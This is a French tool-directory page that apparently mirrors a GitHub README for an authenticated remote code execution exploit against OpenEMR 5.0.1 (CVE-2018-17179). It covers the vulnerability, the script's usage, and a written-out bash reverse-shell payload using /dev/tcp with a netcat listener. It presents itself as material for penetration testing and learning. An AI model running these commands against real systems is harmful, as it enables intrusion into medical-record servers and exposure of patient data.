Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-17179-OpenEMR — Exploit d'exécution de code à distance authentifié pour OpenEMR 5.0.1 (CVE-2018-17179) avec des payloads de commande personnalisables et support de reverse shell pour les tests de pénétration éducatifs. | Kitploit
Outils/GitHubGitHub/cyberquestor-infosec/cve-2018-17179-openemr
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcyberquestor-infosec/cve-2018-17179-openemr

CVE-2018-17179-OpenEMR

Exploit d'exécution de code à distance authentifié pour OpenEMR 5.0.1 (CVE-2018-17179) avec des payloads de commande personnalisables et support de reverse shell pour les tests de pénétration éducatifs.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-17179-OpenEMR

⚠️ Avertissement
Ce dépôt est destiné uniquement à des fins éducatives et de recherche.
Les informations et le code fournis ici peuvent être utilisés dans des environnements contrôlés, tels que des machines de laboratoire privées.

Toute utilisation non autorisée de ce code contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.
L'auteur n'est pas responsable de tout usage abusif ou des dommages causés.


🔍 À propos de la vulnérabilité

CVE-2018-17179 affecte OpenEMR, un logiciel open-source largement utilisé de dossiers médicaux électroniques et de gestion de cabinet.
Une faille dans le mécanisme d'authentification du point de terminaison rest_routes.php permet à un utilisateur authentifié d'exécuter des commandes arbitraires sur le serveur.

Cela peut conduire à une exécution de code à distance (RCE) dans le contexte de l'utilisateur du serveur web.

  • Type de vulnérabilité : Exécution de code à distance authentifiée
  • Composant affecté : interface/main/main_screen.php via rest_routes.php
  • Authentification requise : ✅ Oui
  • Sévérité : Critique
  • Score CVSS : 9.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

🧾 Références

  • Entrée Exploit-DB – 45161
  • Dépôt GitHub d'OpenEMR
  • Détails CVE – CVE-2018-17179
  • Rapport NVD CVE

🛠 Aperçu de l'exploit

Ce dépôt fournit une version modifiée de l'exploit public d'Exploit-DB :

  • Titre de l'exploit : OpenEMR 5.0.1 – RCE authentifiée
  • ID ExploitDB : 45161
  • Langage : Python 2
  • Authentification requise : Oui

Dans cet exploit personnalisé :

  • Vous pouvez spécifier directement votre charge utile de commande (par exemple, reverse shell).
  • L'exploit permet une exécution propre en ligne de commande pour plus de flexibilité.
  • Les champs sensibles comme la génération de cookie de session et la logique d'injection de commande ont été préservés de l'original.

💥 Démonstration

🔐 Page de connexion

Ciblage d'un panneau de connexion OpenEMR de test local :

Page de connexion


📂 Utilisation de l'exploit

Usage: python2 exploit.py <target_url> -u <username> -p <password> -c <command>

Example:
python2 exploit.py http://<target>/openemr -u admin -p secretpass -c 'id'
  • Assurez-vous d'avoir Python 2 installé.
  • L'utilisateur doit avoir accès au point de terminaison vulnérable rest_routes.php.

Exécuter l'exploit

J'ai exécuté le script d'exploit modifié avec une charge utile de reverse shell bash :

```bash
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

Sortie de l'exploit

Étape 3 – Reverse shell capturé

L'écouteur Netcat sur le port 4444 a reçu avec succès un reverse shell :

nc -nvlp 4444

Sortie de l'exploit

📖 Blog Medium

Consultez la procédure détaillée et la théorie sur mon post Medium :
👉 Lire le blog sur Medium

Télécharger l’outil